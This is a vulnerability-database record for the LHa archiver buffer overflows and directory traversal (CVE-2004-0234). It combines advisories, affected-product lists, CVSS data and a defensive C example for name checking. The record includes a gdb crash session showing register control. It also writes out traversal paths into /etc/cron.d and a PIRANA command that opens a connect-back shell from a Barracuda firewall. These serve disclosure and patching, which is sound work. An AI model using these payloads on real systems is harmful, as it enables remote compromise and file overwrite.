ID

VAR-200408-0140


CVE

CVE-2004-0234


TITLE

LHa Buffer Overflow Vulnerability in Testing and Extracting Process

Trust: 0.8

sources: JVNDB: JVNDB-2004-000169

DESCRIPTION

Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. **NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. **Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. These vulnerabilities are related to: SA11510 SA19002 Successful exploitation allows execution of arbitrary code. 
------------------------------------------------------------------------

LHa buffer overflows and directory traversal problems

PROGRAM: LHa (Unix version)
VENDOR: various people
VULNERABLE VERSIONS: 1.14d to 1.14i
                     1.17 (Linux binary)
                     possibly others
IMMUNE VERSIONS: 1.14i with my patch applied
                 1.14h with my patch applied
LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm
          http://www2m.biglobe.ne.jp/~dolphin/lha/prog/
LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/
REFERENCES: CAN-2004-0234 (buffer overflows)
            CAN-2004-0235 (directory traversal)

* DESCRIPTION *

LHa is a console-based program for packing and unpacking LHarc archives. It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.

* OVERVIEW *

LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case.

The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture: $ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... 
(gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? 
() Cannot access memory at address 0x55555555
(gdb) i r
eax 0x4001e4a0 1073865888
ecx 0xffffffe0 -32
edx 0x24 36
ebx 0x55555555 1431655765
esp 0xbfffe6d0 0xbfffe6d0
ebp 0x55555555 0x55555555
esi 0x55555555 1431655765
edi 0x55555555 1431655765
eip 0x55555555 0x55555555
eflags 0x210286 2163334
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Exit anyway? (y or n) y
$

b) two directory traversal problems

LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".

* ATTACHED FILES *

I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.

* TIMELINE *

18 Apr: contacted the vendor-sec list and the LHa 1.14 author
18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced
19 Apr: reply from the vendor-sec list with CVE references
30 Apr: Red Hat released their advisory
01 May: I release this advisory

// Ulf Harnhammar
Advogato diary :: http://www.advogato.org/person/metaur/
idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/
Debian Security Audit Project :: http://shellcode.org/Audit/

------------------------------------------------------------------------
TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow
SECUNIA ADVISORY ID: SA19002
VERIFY ADVISORY: http://secunia.com/advisories/19002/
CRITICAL: Moderately critical
IMPACT: DoS, System access
WHERE: From remote
SOFTWARE: zoo 2.x http://secunia.com/product/8297/

DESCRIPTION: Jean-Sébastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive). The vulnerability has been confirmed in version 2.10. Other versions may also be affected.

SOLUTION: Restrict use to trusted ZOO archives.

PROVIDED AND/OR DISCOVERED BY: Jean-Sébastien Guay-Leroux

ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt

----------------------------------------------------------------------
Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: http://www.barracudanetworks.com/
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234

I. BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection:

* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service

II. DESCRIPTION

When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program. Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall. You do NOT need to have remote administration access (on port 8000) for successful exploitation. For further information about the details of the bugs, you can consult OSVDB #5753 and #5754.

III. IMPACT

Gain shell access to the remote Barracuda Spam Firewall

IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
 -p 1234 -z -c 1 -d 1

V. SOLUTION

Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006. They also published an official patch in firmware #3.3.03.022, available April 3rd 2006. It is recommended to update to firmware #3.3.03.022.

VI. CREDITS

Ulf Harnhammar who found the original LHA flaw.
Jean-Sébastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework.

VII. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234

VIII. HISTORY

2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
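The two checks that Ulf Harnhammar's advisory above describes as missing (a bound on the name length read from the archive, and rejection of absolute and ".." paths), as an added example that is neither his patch nor LHa's code. The function names, the buffer sizes and the field layout (a length followed by that many name bytes) are assumptions for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result codes for the hypothetical name-field reader below. */
enum name_status {
    NAME_OK = 0,
    NAME_TRUNCATED_INPUT,   /* header claims more bytes than the archive holds */
    NAME_TOO_LONG,          /* name would not fit the destination array */
    NAME_EMBEDDED_NUL       /* NUL inside the name would hide its tail from later checks */
};

/*
 * Copy a name whose length (claimed_len) was read from the archive itself.
 * in/in_len describe the header bytes that are actually available.
 * The length is checked against both the input and the destination before
 * any byte is copied; this is the check the advisory says is missing.
 */
static enum name_status copy_name_field(const unsigned char *in, size_t in_len,
                                        size_t claimed_len,
                                        char *out, size_t out_cap)
{
    if (claimed_len > in_len)
        return NAME_TRUNCATED_INPUT;
    if (out_cap == 0 || claimed_len >= out_cap)   /* keep room for the NUL */
        return NAME_TOO_LONG;
    if (memchr(in, '\0', claimed_len) != NULL)
        return NAME_EMBEDDED_NUL;
    memcpy(out, in, claimed_len);
    out[claimed_len] = '\0';
    return NAME_OK;
}

/*
 * Return 1 if path may be created below the extraction directory, else 0.
 * Assumes '/' is the only separator by the time the path reaches this check.
 * Absolute paths are rejected outright instead of having one slash skipped,
 * so "//etc/..." cannot slip through; any ".." component is rejected too.
 */
static int path_is_safe(const char *path)
{
    const char *p = path;

    if (*p == '\0' || *p == '/')
        return 0;
    while (*p != '\0') {
        const char *slash = strchr(p, '/');
        size_t n = slash ? (size_t)(slash - p) : strlen(p);

        if (n == 2 && p[0] == '.' && p[1] == '.')
            return 0;
        p += n;
        while (*p == '/')       /* collapse runs of separators */
            p++;
    }
    return 1;
}

/* Both checks together: 1 if the member name is accepted, 0 otherwise. */
static int accept_member(const unsigned char *in, size_t in_len,
                         size_t claimed_len, char *out, size_t out_cap)
{
    if (copy_name_field(in, in_len, claimed_len, out, out_cap) != NAME_OK)
        return 0;
    return path_is_safe(out);
}

int main(void)
{
    /* Constructed sample names; the two traversal paths are the ones quoted
       in the advisory. */
    static const char *samples[] = {
        "docs/readme.txt",
        "../../../../../etc/cron.d/evil",
        "//etc/cron.d/evil",
    };
    char name[64];              /* assumed capacity, not LHa's array size */
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        size_t len = strlen(samples[i]);
        int ok = accept_member((const unsigned char *)samples[i], len, len,
                               name, sizeof name);
        printf("%-32s %s\n", samples[i], ok ? "accepted" : "rejected");
    }
    return 0;
}
```

A scanner or unpacker that applies both checks before touching the filesystem rejects the overlong-name archives and both traversal forms without needing to trust the archive's own length fields.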

Trust: 2.34

sources: NVD: CVE-2004-0234 // JVNDB: JVNDB-2004-000169 // BID: 10243 // VULHUB: VHN-8664 // PACKETSTORM: 45159 // PACKETSTORM: 33241 // PACKETSTORM: 44104 // PACKETSTORM: 45164

AFFECTED PRODUCTS

vendor: f secure | model: f-secure personal express | scope: eq | version: 4.7 | Trust: 1.6
vendor: winzip | model: winzip | scope: eq | version: 9.0 | Trust: 1.3
vendor: stalker | model: cgpmcafee | scope: eq | version: 3.2 | Trust: 1.3
vendor: sgi | model: propack | scope: eq | version: 3.0 | Trust: 1.3
vendor: sgi | model: propack | scope: eq | version: 2.4 | Trust: 1.3
vendor: rarlab | model: winrar | scope: eq | version: 3.20 | Trust: 1.3
vendor: f secure | model: internet gatekeeper | scope: eq | version: 6.32 | Trust: 1.3
vendor: f secure | model: internet gatekeeper | scope: eq | version: 6.31 | Trust: 1.3
vendor: f secure | model: f-secure for firewalls | scope: eq | version: 6.20 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.13 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.11 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.10 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.8 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.7 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.6 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.5 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.4 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.3 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.2 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.1 | Trust: 1.3
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.0 | Trust: 1.3
vendor: f secure | model: f-secure personal express | scope: eq | version: 4.6 | Trust: 1.0
vendor: f secure | model: f-secure internet security | scope: eq | version: 2003 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 2003 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 5.42 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 5.52 | Trust: 1.0
vendor: f secure | model: f-secure internet security | scope: eq | version: 2004 | Trust: 1.0
vendor: tsugio okamoto | model: lha | scope: eq | version: 1.15 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 5.41 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 4.51 | Trust: 1.0
vendor: f secure | model: f-secure personal express | scope: eq | version: 4.5 | Trust: 1.0
vendor: redhat | model: fedora core | scope: eq | version: core_1.0 | Trust: 1.0
vendor: redhat | model: lha | scope: eq | version: 1.14i-9 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 2004 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 4.52 | Trust: 1.0
vendor: tsugio okamoto | model: lha | scope: eq | version: 1.14 | Trust: 1.0
vendor: tsugio okamoto | model: lha | scope: eq | version: 1.17 | Trust: 1.0
vendor: clearswift | model: mailsweeper | scope: eq | version: 4.3.6_sp1 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 4.60 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 6.21 | Trust: 1.0
vendor: f secure | model: f-secure anti-virus | scope: eq | version: 5.5 | Trust: 1.0
vendor: lha for unix | model: lha for unix | scope: lte | version: 1.17 | Trust: 0.8
vendor: red hat | model: enterprise linux | scope: eq | version: 2.1 (as) | Trust: 0.8
vendor: red hat | model: enterprise linux | scope: eq | version: 2.1 (es) | Trust: 0.8
vendor: red hat | model: enterprise linux | scope: eq | version: 2.1 (ws) | Trust: 0.8
vendor: red hat | model: enterprise linux | scope: eq | version: 3 (as) | Trust: 0.8
vendor: red hat | model: enterprise linux | scope: eq | version: 3 (es) | Trust: 0.8
vendor: red hat | model: enterprise linux | scope: eq | version: 3 (ws) | Trust: 0.8
vendor: red hat | model: enterprise linux desktop | scope: eq | version: 3.0 | Trust: 0.8
vendor: red hat | model: linux | scope: eq | version: 9 | Trust: 0.8
vendor: red hat | model: linux advanced workstation | scope: eq | version: 2.1 | Trust: 0.8
vendor: redhat | model: linux i686 | scope: eq | version: 7.3 | Trust: 0.3
vendor: redhat | model: linux i386 | scope: eq | version: 7.3 | Trust: 0.3
vendor: redhat | model: linux | scope: eq | version: 7.3 | Trust: 0.3
vendor: redhat | model: lha-1.14i-9.i386.rpm | scope: - | version: - | Trust: 0.3
vendor: red | model: hat fedora core1 | scope: - | version: - | Trust: 0.3
vendor: mr | model: s.k. lha | scope: eq | version: 1.17 | Trust: 0.3
vendor: mr | model: s.k. lha | scope: eq | version: 1.15 | Trust: 0.3
vendor: mr | model: s.k. lha | scope: eq | version: 1.14 | Trust: 0.3
vendor: mcafee | model: webshield smtp | scope: eq | version: 4.5 | Trust: 0.3
vendor: mcafee | model: webshield appliances | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: virusscan professional | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: virusscan for netapp | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: virusscan enterprise i | scope: eq | version: 8.0 | Trust: 0.3
vendor: mcafee | model: virusscan command line | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 9.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 8.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 7.1 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 7.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 6.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 5.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 4.5.1 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 4.5 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 4.0.3 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 4.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 3.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 2.0 | Trust: 0.3
vendor: mcafee | model: virusscan | scope: eq | version: 1.0 | Trust: 0.3
vendor: mcafee | model: virex | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: securityshield for microsoft isa server | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: portalshield for microsoft sharepoint | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: netshield for netware | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: managed virusscan | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: linuxshield | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: internet security suite | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: groupshield for mail servers with epo | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: groupshield for lotus domino | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: groupshield for exchange | scope: eq | version: 5.5 | Trust: 0.3
vendor: mcafee | model: asap virusscan | scope: eq | version: 0 | Trust: 0.3
vendor: mcafee | model: active virus defense smb edition | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: active threat protection | scope: - | version: - | Trust: 0.3
vendor: mcafee | model: active mail protection | scope: - | version: - | Trust: 0.3
vendor: f secure | model: personal express | scope: eq | version: 4.7 | Trust: 0.3
vendor: f secure | model: personal express | scope: eq | version: 4.6 | Trust: 0.3
vendor: f secure | model: personal express | scope: eq | version: 4.5 | Trust: 0.3
vendor: f secure | model: internet security | scope: eq | version: 2004 | Trust: 0.3
vendor: f secure | model: internet security | scope: eq | version: 2003 | Trust: 0.3
vendor: f secure | model: anti-virus for workstations | scope: eq | version: 5.42 | Trust: 0.3
vendor: f secure | model: anti-virus for workstations | scope: eq | version: 5.41 | Trust: 0.3
vendor: f secure | model: anti-virus for windows servers | scope: eq | version: 5.42 | Trust: 0.3
vendor: f secure | model: anti-virus for windows servers | scope: eq | version: 5.41 | Trust: 0.3
vendor: f secure | model: anti-virus for samba servers | scope: eq | version: 4.60 | Trust: 0.3
vendor: f secure | model: anti-virus for ms exchange | scope: eq | version: 6.21 | Trust: 0.3
vendor: f secure | model: anti-virus for mimesweeper | scope: eq | version: 5.42 | Trust: 0.3
vendor: f secure | model: anti-virus for mimesweeper | scope: eq | version: 5.41 | Trust: 0.3
vendor: f secure | model: anti-virus for linux workstations | scope: eq | version: 4.52 | Trust: 0.3
vendor: f secure | model: anti-virus for linux workstations | scope: eq | version: 4.51 | Trust: 0.3
vendor: f secure | model: anti-virus for linux servers | scope: eq | version: 4.52 | Trust: 0.3
vendor: f secure | model: anti-virus for linux servers | scope: eq | version: 4.51 | Trust: 0.3
vendor: f secure | model: anti-virus for linux gateways | scope: eq | version: 4.52 | Trust: 0.3
vendor: f secure | model: anti-virus for linux gateways | scope: eq | version: 4.51 | Trust: 0.3
vendor: f secure | model: anti-virus client security | scope: eq | version: 5.52 | Trust: 0.3
vendor: f secure | model: anti-virus client security | scope: eq | version: 5.50 | Trust: 0.3
vendor: f secure | model: anti-virus | scope: eq | version: 2004 | Trust: 0.3
vendor: f secure | model: anti-virus | scope: eq | version: 2003 | Trust: 0.3
vendor: clearswift | model: mailsweeper sp1 | scope: eq | version: 4.3.6 | Trust: 0.3
vendor: barracuda | model: networks barracuda spam firewall | scope: eq | version: 3.1.18 | Trust: 0.3
vendor: barracuda | model: networks barracuda spam firewall | scope: eq | version: 3.1.17 | Trust: 0.3
vendor: barracuda | model: networks barracuda spam firewall | scope: ne | version: 3.3.03.022 | Trust: 0.3

sources: BID: 10243 // JVNDB: JVNDB-2004-000169 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2004-0234
value: HIGH

Trust: 1.0

NVD: CVE-2004-0234
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200408-202
value: CRITICAL

Trust: 0.6

VULHUB: VHN-8664
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2004-0234
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-8664
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-8664 // JVNDB: JVNDB-2004-000169 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.1

sources: VULHUB: VHN-8664 // NVD: CVE-2004-0234

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 45164 // CNNVD: CNNVD-200408-202

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-200408-202

CONFIGURATIONS

sources: JVNDB: JVNDB-2004-000169

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-8664

PATCH

title: LHA for UNIX Version 1.17 | url: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ | Trust: 0.8
title: Top Page | url: http://lha.sourceforge.jp/ | Trust: 0.8
title: RHSA-2004:178 | url: https://rhn.redhat.com/errata/RHSA-2004-178.html | Trust: 0.8
title: RHSA-2004:179 | url: https://rhn.redhat.com/errata/RHSA-2004-179.html | Trust: 0.8

sources: JVNDB: JVNDB-2004-000169

EXTERNAL IDS

db: NVD | id: CVE-2004-0234 | Trust: 3.0
db: BID | id: 10243 | Trust: 2.8
db: OSVDB | id: 5754 | Trust: 2.5
db: OSVDB | id: 5753 | Trust: 2.5
db: SECTRACK | id: 1015866 | Trust: 2.5
db: SECUNIA | id: 19514 | Trust: 1.8
db: VUPEN | id: ADV-2006-1220 | Trust: 1.7
db: XF | id: 16012 | Trust: 1.4
db: JVNDB | id: JVNDB-2004-000169 | Trust: 0.8
db: FULLDISC | id: 20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS | Trust: 0.6
db: FULLDISC | id: 20040502 LHA LOCAL STACK OVERFLOW PROOF OF CONCEPT CODE | Trust: 0.6
db: FEDORA | id: FEDORA-2004-119 | Trust: 0.6
db: FEDORA | id: FLSA:1833 | Trust: 0.6
db: REDHAT | id: RHSA-2004:179 | Trust: 0.6
db: REDHAT | id: RHSA-2004:178 | Trust: 0.6
db: BUGTRAQ | id: 20060403 BARRACUDA LHA ARCHIVER SECURITY BUG LEADS TO REMOTE COMPROMISE | Trust: 0.6
db: BUGTRAQ | id: 20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH | Trust: 0.6
db: OVAL | id: OVAL:ORG.MITRE.OVAL:DEF:977 | Trust: 0.6
db: OVAL | id: OVAL:ORG.MITRE.OVAL:DEF:9881 | Trust: 0.6
db: GENTOO | id: GLSA-200405-02 | Trust: 0.6
db: DEBIAN | id: DSA-515 | Trust: 0.6
db: CONECTIVA | id: CLA-2004:840 | Trust: 0.6
db: CNNVD | id: CNNVD-200408-202 | Trust: 0.6
db: PACKETSTORM | id: 33241 | Trust: 0.2
db: VULHUB | id: VHN-8664 | Trust: 0.1
db: PACKETSTORM | id: 45159 | Trust: 0.1
db: SECUNIA | id: 19002 | Trust: 0.1
db: PACKETSTORM | id: 44104 | Trust: 0.1
db: PACKETSTORM | id: 45164 | Trust: 0.1

sources: VULHUB: VHN-8664 // BID: 10243 // JVNDB: JVNDB-2004-000169 // PACKETSTORM: 45159 // PACKETSTORM: 33241 // PACKETSTORM: 44104 // PACKETSTORM: 45164 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

REFERENCES

url:http://www.securityfocus.com/bid/10243

Trust: 2.5

url:http://securitytracker.com/id?1015866

Trust: 2.5

url:http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html

Trust: 2.0

url:http://marc.info/?l=bugtraq&m=108422737918885&w=2

Trust: 1.8

url:http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html

Trust: 1.7

url:http://www.debian.org/security/2004/dsa-515

Trust: 1.7

url:https://bugzilla.fedora.us/show_bug.cgi?id=1833

Trust: 1.7

url:http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html

Trust: 1.7

url:http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020778.html

Trust: 1.7

url:http://security.gentoo.org/glsa/glsa-200405-02.xml

